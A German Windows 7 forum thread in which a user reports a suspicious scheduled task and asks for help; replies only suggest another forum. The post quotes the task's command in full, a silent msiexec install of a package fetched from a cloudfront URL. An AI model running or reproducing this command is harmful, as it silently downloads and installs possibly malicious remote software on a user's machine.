Myteriöser Task (Malwareverdacht)

Diskutiere Myteriöser Task (Malwareverdacht) im Windows 7 Sicherheit Forum im Bereich Windows 7; Soll natürlich heißen: Mysteriöser Task (hab nicht gefunden, wo ich das Thema korrigieren kann) Habe auf meinem PC einen seltsamen Task entdeckt....

1. #1 tomybyte, 02.05.2017
    tomybyte

tomybyte Neuer Benutzer

Version:
    Ultimate / 64-bit
    System:
    AMD Northbridge 770, FX 6300, SATA-RAID
    Soll natürlich heißen: Mysteriöser Task (hab nicht gefunden, wo ich das Thema korrigieren kann)

Habe auf meinem PC einen seltsamen Task entdeckt. Name: Wiqukreizasy
    Ausführung: 10:32 Uhr am 2.12.2017 danach alle 4 Stunden
    Aktion: msiexec /i HtTp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=395049983_6295328_BCEEEA0A&v=2017212 /q
    SpyHunter und Kaspersky AV finden nichts diesbezüglich auf meinem PC.
    Hab den Task aus Sicherheitsgründen deaktiviert.
    Weiss jemand etwas dazu oder kann mir ein Forum nennen, wo sich User treffen, die sich damit auskennen könnten. Verwendete früher Hijackthis. Das scheint nicht mehr aktiv.

2. #2 Harald aus RE, 02.05.2017
    Harald aus RE

Harald aus RE Erfahrener Benutzer

Version:
    WIN7 Prof 32bit
    System:
    INTEL Core i7-3770K 3,5GHz LGA1155; MB ASUS 1155 P8Z77-WS;4 GB RAM;NVIDIA GeForce GT 640
    Hallo tomybyte,

eventuell hilft das englischsprachige Forum weiter
    Logs of the scan
    weiter finde ich nichts zu dem Thema. Hoffentlich keine Ransomware.

Gruß Harald

3. #3 HerrAbisZ, 03.05.2017
    HerrAbisZ

HerrAbisZ Erfahrener Benutzer

Version:
    XP, Win7, Vista, Win2K, Win98SE, Linux Mint, FreeDos, Win8
    System:
    Sony PCV-RZ102 uvam 486DX bis AMD 6core FX6150 Notebooks: Dell, PB Dots-c, DTK TOP-5A, Lenovo, ASUS
Thema: Myteriöser Task (Malwareverdacht)
Besucher kamen mit folgenden Suchen
  1. mysteriöser task

Die Seite wird geladen...

Myteriöser Task (Malwareverdacht) - Ähnliche Themen

1. Tasks Kontextmenü-Eintrag entfernen

Tasks Kontextmenü-Eintrag entfernen: Gibt es eine Möglichkeit, den Eintrag der Task-Kontextmenüs "Dieses Programm an Taskleiste anheften" zu entfernen?
  2. Taskplaner - wer löscht meine Tasks?!

Taskplaner - wer löscht meine Tasks?!: hallo zusammen, ich habe einige powershell (und batch) skripte im taskplaner gehabt. doch nun wurden mir zum zweiten mal zuverlässig ALLE...
  3. Scheduled Task pops up command console

Scheduled Task pops up command console: Hi I have a scheduled task which runs every hour. With every run a command pops up. The vb-script looks like: Dim WinScriptHost Set...
  4. CPU Auslastung hoch bei ca 50 - 60 Prozent - Task Manager sieht keine verursachenden Prozesse

CPU Auslastung hoch bei ca 50 - 60 Prozent - Task Manager sieht keine verursachenden Prozesse: Liebe Leute, bei meinem Lenovo x121e, AMD-Technologie, Windows 7 Professional 64bit habe das folgende Problem: Der PC ist langsamer als er mal...
  5. Permanente CPU Auslastung 98-100% selbst wenn nur im Internet Gesurt wird?

Permanente CPU Auslastung 98-100% selbst wenn nur im Internet Gesurt wird?: Permanente CPU Auslastung 98-100% selbst wenn nur im Internet Gesurft wird? Seit einigen Wochen läuft mein Rechner im Internet irgend wie...
  1. Diese Seite verwendet Cookies um Inhalte zu personalisieren. Außerdem werden auch Cookies von Diensten Dritter gesetzt. Mit dem weiteren Aufenthalt akzeptierst du diesen Einsatz von Cookies.
    Information ausblenden